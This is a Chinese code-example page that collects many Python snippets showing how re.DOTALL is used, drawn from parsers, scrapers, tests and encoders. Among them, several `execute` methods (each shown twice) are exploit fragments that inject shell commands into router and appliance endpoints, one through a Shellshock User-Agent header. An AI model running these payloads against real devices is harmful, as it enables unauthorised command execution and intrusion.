Python re 模块,DOTALL 实例源码
我们从Python开源项目中,提取了以下49个代码示例,用于说明如何使用re.DOTALL。
def get_action(driver, keyword):
"""get action class corresponding to the keyword in the driver
"""
drvmod = 'ProductDrivers.' + driver
drvmodobj = importlib.import_module(drvmod)
drvfile_methods = inspect.getmembers(drvmodobj, inspect.isroutine)
main_method = [item[1] for item in drvfile_methods if item[0] == 'main'][0]
main_src = inspect.getsource(main_method)
pkglstmatch = re.search(r'package_list.*=.*\[(.*)\]', main_src, re.MULTILINE | re.DOTALL)
pkglst = pkglstmatch.group(1).split(',')
for pkg in pkglst:
pkgobj = importlib.import_module(pkg)
pkgdir = os.path.dirname(pkgobj.__file__)
action_modules = [pkg+'.'+name for _, name, _ in pkgutil.iter_modules([pkgdir])]
action_module_objs = [importlib.import_module(action_module) for action_module in action_modules]
for action_module_obj in action_module_objs:
for action_class in inspect.getmembers(action_module_obj, inspect.isclass):
for func_name in inspect.getmembers(action_class[1], inspect.isroutine):
if keyword == func_name[0]:
return action_class[1]
return None
def safe_text_for_markdown(text):
"""Clean the text using bleach but keep certain Markdown sections.
Markdown code ie ` or ``` combos. For single `, do not allow line breaks between the tag.
Quotes ie '> ' which bleach would clean up.
"""
code_blocks, text = code_blocks_add_markers(text)
# Store quotes next
text = re.sub(r"(^> )", "%%safe_quote_in_start%%", text)
text = re.sub(r"(\n> )", "%%safe_quote_in_new_line%%", text, flags=re.DOTALL)
# Nuke all html, scripts, etc
text = bleach.clean(text or "")
# Return quotes
text = text.replace("%%safe_quote_in_start%%", "> ")
text = text.replace("%%safe_quote_in_new_line%%", "\n> ")
text = code_blocks_restore(code_blocks, text)
return text
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
result = client.request(url)
# cant user dom parser here because HTML is bugged div is not closed
result = re.findall ('<ul class="episodios">(.*?)</ul>', result, re.MULTILINE | re.DOTALL)
for item in result:
season_episodes = re.findall ('<li>(.*?)</li>', item, re.MULTILINE | re.DOTALL)
for row in season_episodes:
s = client.parseDOM(row, 'div', attrs={'class': 'numerando'})[0].split('x')
season_found = s[0].strip()
episode_found = s[1].strip()
if(season_found != season):
break
if episode_found == episode :
return client.parseDOM(row, 'a', ret='href')[0]
except:
return
def __search(self, titles, year):
try:
r = urllib.urlencode({'keyword': titles[0]})
r = client.request(urlparse.urljoin(self.base_link, self.search_link), XHR=True, post=r)
t = [cleantitle.get(i) for i in set(titles) if i]
y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']
r = json.loads(r)
r = [(i['link'], re.sub('<.+?>|</.+?>', '', i['title'])) for i in r if 'title' in i and 'link' in i]
r = [(i[0], i[1], re.findall('(.+?)\s*Movie \d+:.+?$', i[1], re.DOTALL)) for i in r]
r = [(i[0], i[2][0] if len(i[2]) > 0 else i[1]) for i in r]
r = [(i[0], i[1], re.findall('(.+?) \((\d{4})\)?', i[1])) for i in r]
r = [(i[0], i[2][0][0] if len(i[2]) > 0 else i[1], i[2][0][1] if len(i[2]) > 0 else '0') for i in r]
r = sorted(r, key=lambda i: int(i[2]), reverse=True) # with year > no year
r = [i[0] for i in r if cleantitle.get(i[1]) in t and i[2] in y][0]
return source_utils.strip_domain(r)
except:
return
def remove_cpp_comment(code):
def blotOutNonNewlines(strIn): # Return a string containing only the newline chars contained in strIn
return "" + ("\n" * strIn.count('\n'))
def replacer(match):
s = match.group(0)
if s.startswith('/'): # Matched string is //...EOL or /*...*/ ==> Blot out all non-newline chars
return blotOutNonNewlines(s)
else: # Matched string is '...' or "..." ==> Keep unchanged
return s
pattern = re.compile(
r'//.*?$|/\*.*?\*/|\'(?:\\.|[^\\\'])*\'|"(?:\\.|[^\\"])*"',
re.DOTALL | re.MULTILINE
)
return re.sub(pattern, replacer, code)
#remove non ASCII chars
def str_flags_to_int(str_flags):
flags = 0
if "i" in str_flags:
flags |= re.IGNORECASE
if "l" in str_flags:
flags |= re.LOCALE
if "m" in str_flags:
flags |= re.MULTILINE
if "s" in str_flags:
flags |= re.DOTALL
if "u" in str_flags:
flags |= re.UNICODE
if "x" in str_flags:
flags |= re.VERBOSE
return flags
def _encode_regex(name, value, dummy0, dummy1):
"""Encode a python regex or bson.regex.Regex."""
flags = value.flags
# Python 2 common case
if flags == 0:
return b"\x0B" + name + _make_c_string_check(value.pattern) + b"\x00"
# Python 3 common case
elif flags == re.UNICODE:
return b"\x0B" + name + _make_c_string_check(value.pattern) + b"u\x00"
else:
sflags = b""
if flags & re.IGNORECASE:
sflags += b"i"
if flags & re.LOCALE:
sflags += b"l"
if flags & re.MULTILINE:
sflags += b"m"
if flags & re.DOTALL:
sflags += b"s"
if flags & re.UNICODE:
sflags += b"u"
if flags & re.VERBOSE:
sflags += b"x"
sflags += b"\x00"
return b"\x0B" + name + _make_c_string_check(value.pattern) + sflags
def run(cls):
"""Check variables."""
project = __import__(IMPORT, fromlist=[''])
for expected, var in [('@Robpol86', '__author__'), (LICENSE, '__license__'), (VERSION, '__version__')]:
if getattr(project, var) != expected:
raise SystemExit('Mismatch: {0}'.format(var))
# Check changelog.
if not re.compile(r'^%s - \d{4}-\d{2}-\d{2}[\r\n]' % VERSION, re.MULTILINE).search(readme()):
raise SystemExit('Version not found in readme/changelog file.')
# Check tox.
if INSTALL_REQUIRES:
contents = readme('tox.ini')
section = re.compile(r'[\r\n]+install_requires =[\r\n]+(.+?)[\r\n]+\w', re.DOTALL).findall(contents)
if not section:
raise SystemExit('Missing install_requires section in tox.ini.')
in_tox = re.findall(r' ([^=]+)==[\w\d.-]+', section[0])
if INSTALL_REQUIRES != in_tox:
raise SystemExit('Missing/unordered pinned dependencies in tox.ini.')
def strip_powershell_comments(data):
"""
Strip block comments, line comments and empty lines from a PowerShell source file.
"""
# strip block comments
strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', data)
# strip blank lines and lines starting with #
# noinspection PyPep8
strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and
(not line.strip().startswith("#")))])
# TODO: strip comments at the end of lines
return strippedCode
def helper(self, term_instance):
"""
Called at the start of a WAV file capture. Calculates the length of the
file and modifies `self.re_capture` with laser precision.
"""
data = term_instance.capture
self.wav_header = struct.unpack(
'4si4s4sihhiihh4si', self.re_wav_header.match(data).group())
self.wav_length = self.wav_header[1] + 8
if not self.sent_message:
channels = "mono"
if self.wav_header[6] == 2:
channels = "stereo"
if self.wav_length != self.wav_header[12] + 44:
# Corrupt WAV file
message = _("WAV File is corrupted: Header data mismatch.")
term_instance.send_message(message)
term_instance.cancel_capture = True
message = _("WAV File: %skHz (%s)" % (self.wav_header[7], channels))
term_instance.send_message(message)
self.sent_message = True
# Update the capture regex with laser precision:
self.re_capture = re.compile(
b'(RIFF....WAVE.{%s})' % (self.wav_length-12), re.DOTALL)
def str_flags_to_int(str_flags):
flags = 0
if "i" in str_flags:
flags |= re.IGNORECASE
if "l" in str_flags:
flags |= re.LOCALE
if "m" in str_flags:
flags |= re.MULTILINE
if "s" in str_flags:
flags |= re.DOTALL
if "u" in str_flags:
flags |= re.UNICODE
if "x" in str_flags:
flags |= re.VERBOSE
return flags
def str_flags_to_int(str_flags):
flags = 0
if "i" in str_flags:
flags |= re.IGNORECASE
if "l" in str_flags:
flags |= re.LOCALE
if "m" in str_flags:
flags |= re.MULTILINE
if "s" in str_flags:
flags |= re.DOTALL
if "u" in str_flags:
flags |= re.UNICODE
if "x" in str_flags:
flags |= re.VERBOSE
return flags
def str_flags_to_int(str_flags):
flags = 0
if "i" in str_flags:
flags |= re.IGNORECASE
if "l" in str_flags:
flags |= re.LOCALE
if "m" in str_flags:
flags |= re.MULTILINE
if "s" in str_flags:
flags |= re.DOTALL
if "u" in str_flags:
flags |= re.UNICODE
if "x" in str_flags:
flags |= re.VERBOSE
return flags
def str_flags_to_int(str_flags):
flags = 0
if "i" in str_flags:
flags |= re.IGNORECASE
if "l" in str_flags:
flags |= re.LOCALE
if "m" in str_flags:
flags |= re.MULTILINE
if "s" in str_flags:
flags |= re.DOTALL
if "u" in str_flags:
flags |= re.UNICODE
if "x" in str_flags:
flags |= re.VERBOSE
return flags
def ParseWhois_INT(self):
int_contacts = (
{"page_field": "Registrant", "rec_field": "registrant"},
{"page_field": "Administrative Contact", "rec_field": "administrative"},
{"page_field": "Technical Contact", "rec_field": "technical"})
page = string.replace(self.page, "\r\n", "\n")
for contact in int_contacts:
page_field = contact['page_field']
s = "%s:(.*)\n\W" % page_field
m = re.search(s, page, re.DOTALL)
#if m: print m.group(1)
print "-------------------"
##
## ----------------------------------------------------------------------
##
##
## ----------------------------------------------------------------------
##
def __init__(self, pattern, markdown_instance=None):
"""
Create an instant of an inline pattern.
Keyword arguments:
* pattern: A regular expression that matches a pattern
"""
self.pattern = pattern
self.compiled_re = re.compile("^(.*?)%s(.*)$" % pattern,
re.DOTALL | re.UNICODE)
# Api for Markdown to pass safe_mode into instance
self.safe_mode = False
if markdown_instance:
self.markdown = markdown_instance
def chainReplace(toRegex, toValue, toArray):
# TODO clean up so that the input is headers+body and its called only once
# TODO support encoding, including URL encode
isBody = len(toArray)==1
if toRegex:
# BUG FIX: Geoff reported that if the regex ends at the newline on the last header,
# the regex fails. Hacky solution is to add an extra newlines before the regex search
# and remove it after.
to = "\r\n".join(toArray)+"\r\n\r\n"
match = re.search(toRegex, to, re.DOTALL)
if match and len(match.groups()):
ret = (to[0:match.start(1)]+toValue+to[match.end(1):])
if ret[-4:] == "\r\n\r\n":
ret = ret[:-4]
if isBody:
return [ret]
else:
return ret.split("\r\n")
return toArray
## Method to replace custom special types in messages
def test_image_required(self, capfd):
"""
When the main function is given no image argument, it should exit with
a return code of 2 and inform the user of the missing argument.
"""
with ExpectedException(SystemExit, MatchesStructure(code=Equals(2))):
main(['--tag', 'abc'])
out, err = capfd.readouterr()
assert_that(out, Equals(''))
# More useful error message added to argparse in Python 3
if sys.version_info >= (3,):
# Use re.DOTALL so that '.*' also matches newlines
assert_that(err, MatchesRegex(
r'.*error: the following arguments are required: image$',
re.DOTALL
))
else:
assert_that(
err, MatchesRegex(r'.*error: too few arguments$', re.DOTALL))
def test_version_semver_requires_argument(self, capfd):
"""
When the main function is given the `--version-semver` option without
an argument, an error should be raised.
"""
with ExpectedException(SystemExit, MatchesStructure(code=Equals(2))):
main([
'--version', '1.2.3',
'--version-semver',
'--semver-precision',
'--', 'test-image',
])
out, err = capfd.readouterr()
assert_that(out, Equals(''))
assert_that(err, MatchesRegex(
r'.*error: argument -P/--semver-precision: expected one argument$',
re.DOTALL
))
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/login_handler.php".format(self.target, self.port)
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, mark)
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
if mark in response.text:
regexp = "(|.+?){}".format(mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port)
headers = {
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;' % (mark, cmd, mark)
}
response = http_request(method="GET", url=url, headers=headers)
if response is None:
return ""
if mark in response.text:
regexp = "%s(|.+?)%s" % (mark, mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
marker = random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = {
self.header: injection,
}
response = http_request(method=self.method, url=url, headers=headers)
if response is None:
return
regexp = "{}(.+?){}".format(marker, marker)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
else:
return ""
def execute(self, cmd):
url = "{}:{}/web_shell_cmd.gch".format(self.target, self.port)
headers = {u'Content-Type': u'multipart/form-data'}
data = {'IF_ACTION': 'apply',
'IF_ERRORSTR': 'SUCC',
'IF_ERRORPARAM': 'SUCC',
'IF_ERRORTYPE': '-1',
'Cmd': cmd,
'CmdAck': ''}
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
if response.status_code == 200:
regexp = '<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1">(.*?)</textarea>'
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark)
response = http_request(method="GET", url=url)
if response is None:
return ""
if mark in response.text:
regexp = "(|.+?){}".format(mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def remove_stack_traces(out):
# this regexp taken from Python 2.5's doctest
traceback_re = re.compile(r"""
# Grab the traceback header. Different versions of Python have
# said different things on the first traceback line.
^(?P<hdr> Traceback\ \(
(?: most\ recent\ call\ last
| innermost\ last
) \) :
)
\s* $ # toss trailing whitespace on the header.
(?P<stack> .*?) # don't blink: absorb stuff until...
^(?=\w) # a line *starts* with alphanum.
.*?(?P<exception> \w+ ) # exception name
(?P<msg> [:\n] .*) # the rest
""", re.VERBOSE | re.MULTILINE | re.DOTALL)
blocks = []
for block in blankline_separated_blocks(out):
blocks.append(traceback_re.sub(r"\g<hdr>\n...\n\g<exception>\g<msg>", block))
return "".join(blocks)
def _parse_book_info(html):
"""???????????????????????
:param html(string): ?????????html
"""
end_flag = 'END_FLAG'
html = html.replace('<br>', end_flag)
html = html.replace('<br/>', end_flag)
doc = lxml.html.fromstring(html)
text = doc.text_content()
pattern = r'{}[:?](.*?){}'
result = dict()
for key, column in [
('author', '??'),
('press', '???'),
('publish_date', '???'),
('price', '??')]:
result[key] = re.search(pattern.format(column, end_flag),
text,
re.I | re.DOTALL).group(1).strip()
return result
def fprocess(infilep,outfilep):
"""
Scans an input file for LA equations between double square brackets,
e.g. [[ M3_mymatrix = M3_anothermatrix^-1 ]], and replaces the expression
with a comment containing the equation followed by nested function calls
that implement the equation as C code. A trailing semi-colon is appended.
The equation within [[ ]] should NOT end with a semicolon as that will raise
a ParseException. However, it is ok to have a semicolon after the right brackets.
Other text in the file is unaltered.
The arguments are file objects (NOT file names) opened for reading and
writing, respectively.
"""
pattern = r'\[\[\s*(.*?)\s*\]\]'
eqn = re.compile(pattern,re.DOTALL)
s = infilep.read()
def parser(mo):
ccode = parse(mo.group(1))
return "/* %s */\n%s;\nLAParserBufferReset();\n"%(mo.group(1),ccode)
content = eqn.sub(parser,s)
outfilep.write(content)
##-----------------------------------------------------------------------------------
def DownloadSetting(url):
list = []
try:
req = urllib2.Request(url)
req.add_header('User-Agent', 'VAS')
response = urllib2.urlopen(req)
link = response.read()
response.close()
xx = re.compile('<td><a href="(.+?)">(.+?)</a></td>.*?<td>(.+?)</td>', re.DOTALL).findall(link)
for link, name, date in xx:
print link, name, date
prelink = ''
if not link.startswith("http://"):
prelink = url.replace('asd.php','')
list.append((date, name, prelink + link))
except:
print"ERROR DownloadSetting %s" %(url)
return list
def suffix_map(par, job_suffix_dict, last_suffix_dict):
for key in last_suffix_dict.keys():
par = par.replace('{Suffix:' + key + '}', ' '.join(last_suffix_dict[key]))
suffix_replacement_single = re.compile("\\{Suffix:(\\d+)-(.*?)\\}", re.IGNORECASE | re.DOTALL)
for suf_item in re.findall(suffix_replacement_single, par):
job_step = int(suf_item[0])
if job_step in job_suffix_dict.keys() and suf_item[1] in job_suffix_dict[job_step].keys():
par = par.replace('{Suffix:' + suf_item[0] + '-' + suf_item[1] + '}',
' '.join(job_suffix_dict[job_step][suf_item[1]]))
suffix_replacement_single = re.compile("\\{Suffix:(\\d+)-(.*?)-(\\d+)\\}", re.IGNORECASE | re.DOTALL)
for suf_item in re.findall(suffix_replacement_single, par):
job_step = int(suf_item[0])
file_order = int(suf_item[2]) - 1
if job_step in job_suffix_dict.keys() and suf_item[1] in job_suffix_dict[job_step].keys() \
and file_order < len(job_suffix_dict[job_step][suf_item[1]]):
par = par.replace('{Suffix:' + suf_item[0] + '-' + suf_item[1] + '-' + suf_item[2] + '}',
job_suffix_dict[job_step][suf_item[1]][file_order])
return par
def checked_call(fn, ctx, *args):
res = fn(ctx, *args)
if not ctx.has_error:
return res
type_str = ffi.string(ctx.error_type).decode('utf8')
if ctx.error_display != ffi.NULL:
msg = ffi.string(ctx.error_display).decode('utf8').replace('\n', ' ')
else:
msg = None
err_type = EXCEPTION_MAP.get(type_str)
if err_type is FstError:
if ctx.error_description != ffi.NULL:
desc_str = ffi.string(ctx.error_description).decode('utf8')
else:
desc_str = None
enum_val = re.match(r'(\w+)\(.*?\)', desc_str, re.DOTALL).group(1)
err_type = EXCEPTION_MAP.get("{}::{}".format(type_str, enum_val))
if err_type is None:
msg = "{}: {}".format(enum_val, msg)
if err_type is None:
err_type = FstError
raise err_type(msg)
def cache_call_signatures(evaluator, bracket_leaf, code_lines, user_pos):
"""This function calculates the cache key."""
index = user_pos[0] - 1
before_cursor = code_lines[index][:user_pos[1]]
other_lines = code_lines[bracket_leaf.start_pos[0]:index]
whole = '\n'.join(other_lines + [before_cursor])
before_bracket = re.match(r'.*\(', whole, re.DOTALL)
module_path = bracket_leaf.get_parent_until().path
if module_path is None:
yield None # Don't cache!
else:
yield (module_path, before_bracket, bracket_leaf.start_pos)
yield evaluate_goto_definition(
evaluator,
bracket_leaf.get_previous_leaf()
)
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/login_handler.php".format(self.target, self.port)
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, mark)
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
if mark in response.text:
regexp = "(|.+?){}".format(mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port)
headers = {
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;' % (mark, cmd, mark)
}
response = http_request(method="GET", url=url, headers=headers)
if response is None:
return ""
if mark in response.text:
regexp = "%s(|.+?)%s" % (mark, mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
marker = random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = {
self.header: injection,
}
response = http_request(method=self.method, url=url, headers=headers)
if response is None:
return
regexp = "{}(.+?){}".format(marker, marker)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
else:
return ""
def execute(self, cmd):
url = "{}:{}/web_shell_cmd.gch".format(self.target, self.port)
headers = {u'Content-Type': u'multipart/form-data'}
data = {'IF_ACTION': 'apply',
'IF_ERRORSTR': 'SUCC',
'IF_ERRORPARAM': 'SUCC',
'IF_ERRORTYPE': '-1',
'Cmd': cmd,
'CmdAck': ''}
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return ""
if response.status_code == 200:
regexp = '<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1">(.*?)</textarea>'
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def execute(self, cmd):
mark = random_text(32)
url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, mark)
response = http_request(method="GET", url=url)
if response is None:
return ""
if mark in response.text:
regexp = "(|.+?){}".format(mark)
res = re.findall(regexp, response.text, re.DOTALL)
if len(res):
return res[0]
return ""
def setup_module():
import cffi.verifier
cffi.verifier.cleanup_tmpdir()
#
# check that no $ sign is produced in the C file; it used to be the
# case that anonymous enums would produce '$enum_$1', which was
# used as part of a function name. GCC accepts such names, but it's
# apparently non-standard.
_r_comment = re.compile(r"/\*.*?\*/|//.*?$", re.DOTALL | re.MULTILINE)
_r_string = re.compile(r'\".*?\"')
def _write_source_and_check(self, file=None):
base_write_source(self, file)
if file is None:
f = open(self.sourcefilename)
data = f.read()
f.close()
data = _r_comment.sub(' ', data)
data = _r_string.sub('"skipped"', data)
assert '$' not in data
base_write_source = cffi.verifier.Verifier._write_source
cffi.verifier.Verifier._write_source = _write_source_and_check
def add_head(text):
"""Add head html from template """
head = open(PATH_TO_TEMPLATE_HTML).read()
head = head.replace('{{ url_index }}', PATH_TO_HTML + '/' + 'index.html')
head = head.replace('href="img/', 'href="' + PATH_TO_TEMPLATE + '/img/')
head = head.replace('="lib/', '="' + PATH_TO_TEMPLATE + '/lib/')
head = head.replace('="css/', '="' + PATH_TO_TEMPLATE + '/css/')
head = head.replace('="js/', '="' + PATH_TO_TEMPLATE + '/js/')
# remove demo content
head = re.sub(r'<!-- start of demo -->.*<!-- end of demo -->',
r'', head, flags=re.M | re.DOTALL)
return head + text
#head_new = ''
# for l in head.split('\n'):
# if l.find('href="http://') > -1 or l.find('src="http://') > -1 or l.find('href="#') > -1:
# head_new += l
# else:
# l = l.replace('href=', 'href="' + PATH_TO_TEMPLATE + '"')
# l = l.replace('src=', 'src="' + PATH_TO_TEMPLATE + '"')
# head_new += l
# return head + text
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
music_id = mobj.group('id')
webpage = self._download_webpage(url, music_id)
title = self._html_search_regex(
r'<div id="single_sample_header">.*?<a href="#">(.+?)</a>',
webpage, 'music title', flags=re.DOTALL)
description = self._html_search_regex(
r'<div id="sound_description">(.*?)</div>', webpage, 'description',
fatal=False, flags=re.DOTALL)
return {
'id': music_id,
'title': title,
'url': self._og_search_property('audio', webpage, 'music url'),
'uploader': self._og_search_property('audio:artist', webpage, 'music uploader'),
'description': description,
}
def _title_and_entries(self, list_id, base_url):
for pagenum in itertools.count(1):
page_url = self._page_url(base_url, pagenum)
webpage = self._download_webpage(
page_url, list_id,
'Downloading page %s' % pagenum)
if pagenum == 1:
webpage = self._login_list_password(page_url, list_id, webpage)
yield self._extract_list_title(webpage)
for video_id in re.findall(r'id="clip_(\d+?)"', webpage):
yield self.url_result('https://vimeo.com/%s' % video_id, 'Vimeo')
if re.search(self._MORE_PAGES_INDICATOR, webpage, re.DOTALL) is None:
break
def find_links(file):
"""Find all markdown links in a file object.
Yield (lineno, regexmatch) tuples.
"""
# don't yield same link twice
seen = set()
# we need to loop over the file two lines at a time to support
# multi-line (actually two-line) links, so this is kind of a mess
firsts, seconds = itertools.tee(file)
next(seconds) # first line is never second line
# we want 1-based indexing instead of 0-based and one-line links get
# caught from linepair[1], so we need to start at two
for lineno, linepair in enumerate(zip(firsts, seconds), start=2):
lines = linepair[0] + linepair[1]
for match in re.finditer(_LINK_REGEX, lines, flags=re.DOTALL):
if match.group(0) not in seen:
seen.add(match.group(0))
yield match, lineno
def writeJson(self, inner_path, data):
content = json.dumps(data, indent=1, sort_keys=True)
# Make it a little more compact by removing unnecessary white space
def compact_list(match):
return "[ " + match.group(1).strip() + " ]"
def compact_dict(match):
return "{ " + match.group(1).strip() + " }"
content = re.sub("\[([^,\{\[]{10,100}?)\]", compact_list, content, flags=re.DOTALL)
content = re.sub("\{([^,\[\{]{10,100}?)\}", compact_dict, content, flags=re.DOTALL)
# Write to disk
self.write(inner_path, content)
# Get file size
def getOfflineMediaList(self, folderName=False, title=False, contentType=7):
mediaFiles = []
for r1 in re.finditer('\{(.*?)\"spaces\"\:' , entryS, re.DOTALL):
entry = r1.group(1)
media = self.getMediaPackage(entry, folderName=folderName, contentType=contentType, fanart=folderFanart, icon=folderIcon)
if media is not None:
mediaFiles.append(media)
return mediaFiles
##
# retrieve a list of videos, using playback type stream
# parameters: prompt for video quality (optional), cache type (optional)
# returns: list of videos
##
def transform_template(self, obj):
if obj["name"].startswith("#lst:"):
article_name = remove_prefix(obj["name"], "#lst:")
article = self.api.get_content(article_name)
section_name = obj["params"]["1"]
begin = r"\<section\s+begin\=[\"']?" + re.escape(section_name) + \
r"[\"']?\s*\/>"
end = r"\<section\s+end\=[\"']?" + re.escape(section_name) + \
r"[\"']?\s*\/\>"
section = re.search(begin + "(.*)" + end, article, re.DOTALL)
if section:
section = section.group(1).strip()
content = parse_content(self.api, self.title, section)
return {"type": "included_section", "content": content}
else:
message = "section '{}' of '{}' cannot be included" \
.format(section_name, article_name)
return {"type": "error", "message": message}
else:
raise NotInterested()
def contentMalicious(self, content, goodregex, badregex):
# First, check for the bad indicators
if len(badregex) > 0:
for rx in badregex:
if re.match(rx, content, re.IGNORECASE | re.DOTALL):
self.sf.debug("Found to be bad against bad regex: " + rx)
return True
# Finally, check for good indicators
if len(goodregex) > 0:
for rx in goodregex:
if re.match(rx, content, re.IGNORECASE | re.DOTALL):
self.sf.debug("Found to be good againt good regex: " + rx)
return False
# If nothing was matched, reply None
self.sf.debug("Neither good nor bad, unknown.")
return None
# Look up 'query' type sources
def get_action_dirlist(driverpath):
""" Get the list of action directories
"""
actions_package_list = []
try:
if os.path.isfile(driverpath):
with open(driverpath, 'r') as fobj:
drv_text = fobj.read()
search_string = re.compile('package_list.*=.*\]',
re.DOTALL | re.MULTILINE)
match = re.search(search_string, drv_text)
if match:
match_string = match.group()
# extracting the text within [] and get the list of packages separated by ,
actions_package_list = re.findall(r'\[(.*)\]', match_string)[0].split(',')
print "\n actions package list: ", actions_package_list
else:
print "file {0} does not exist".format(driverpath)
except Exception, e:
print str(e)
return actions_package_list
def get_action_dirlist(driverpath):
""" Get the list of action directories """
actions_package_list = []
try:
if os.path.isfile(driverpath):
lines = []
with open(driverpath, 'r') as fobj:
lines = fobj.readlines()
lines_as_string = ''.join(lines)
search_string = re.compile(r'package_list.*=.*\]', re.DOTALL|re.MULTILINE)
match = re.search(search_string, lines_as_string)
if match:
match_string = match.group()
actions_package_list = match_string.split('[')[1].split(']')[0].split(',')
return actions_package_list
else:
print("file {0} does not exist".format(driverpath))
return actions_package_list
except Exception as exception:
print_exception(exception)
return actions_package_list
def get_history(self, addr):
out = []
o = self.listunspent(addr)
for item in o:
out.append((item['height'], item['tx_hash']))
h = self.db_hist.get(addr)
if h:
for item in re.findall('.{80}', h, flags=re.DOTALL):
txi = item[0:32].encode('hex')
hi = hex_to_int(item[36:40])
txo = item[40:72].encode('hex')
ho = hex_to_int(item[76:80])
out.append((hi, txi))
out.append((ho, txo))
# uniqueness
out = set(out)
# sort by height then tx_hash
out = sorted(out)
return map(lambda x: {'height': x[0], 'tx_hash': x[1]}, out)
def scanner(cls):
if not getattr(cls, '_scanner', None):
def h(tpe):
return lambda sc, tk: cls.Token(tpe, tk)
cls._scanner = re.Scanner([
(r"(--|//).*?$", h(cls.LINE_COMMENT)),
(r"\/\*.+?\*\/", h(cls.BLOCK_COMMENT)),
(r'"(?:[^"\\]|\\.)*"', h(cls.STRING)),
(r"'(?:[^'\\]|\\.)*'", h(cls.STRING)),
(r"\$\$(?:[^\$\\]|\\.)*\$\$", h(cls.STRING)),
(r";", h(cls.SEMICOLON)),
(r"\s+", h(cls.WHITESPACE)),
(r".", h(cls.OTHER))
], re.MULTILINE | re.DOTALL)
return cls._scanner